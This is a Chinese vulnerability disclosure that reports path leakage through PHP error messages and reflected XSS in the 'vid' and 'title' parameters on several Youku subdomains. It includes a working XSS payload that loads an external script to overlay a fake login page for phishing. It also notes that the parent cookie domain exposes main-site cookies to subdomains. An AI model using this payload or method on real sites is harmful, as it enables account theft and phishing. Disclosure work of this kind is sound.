优酷两处配置不当导致路径泄漏和多处XSS(至少20处) XSS主要是由于vid参数未处理,有很多网页都用vid参数调用视频链接。 别小看XSS 配置不当: http://realplayer.youku测试数据/list.php?cls=104 http://realplayer.youku测试数据/detail.php?id=error Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/list.php on line 34 Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/list.php on line 59 ... Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/detail.php on line 12 Warning: simplexml_load_file(http://api.youku测试数据/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/detail.php on line 12 XSS:都为vid参数或title参数存在XSS http://sww.youku测试数据/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87 http://minisite.youku测试数据/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy ... 优酷的COOKIE的DOMAIN为.youku,com,因此可在分站直接获取主站的COOKIE,还可用于跳转与钓鱼 钓鱼: http://minisite.youku测试数据/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy%3C/script%3E%3Cscript%20src=http://127.0.0.1/webpage.js%20type=text/javascript%3Ediaoyu();/* 由函数diaoyu()调取伪造的登录界面并覆盖整个原先的界面(CSS设置下就可以) 漏洞 证明:http://realplayer.youku测试数据/list.php?cls=104#路径 http://realplayer.youku测试数据/detail.php?id=error#路径 http://sww.youku测试数据/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87#XSS http://minisite.youku测试数据/audi-ade/play.php?vid=XMjgwMDk1MjEy&type=tt#XSS Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/list.php on line 34 Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/list.php on line 59 ... Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/detail.php on line 12 Warning: simplexml_load_file(http://api.youku测试数据/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real测试数据/newsite/youku/detail.php on line 12 钓鱼: 修复方案: 更改配置或代码,对相关参数进行处理 作者Ambulong
查看更多关于优酷多处配置不当导致路径泄漏和多处XSS及修复的详细内容...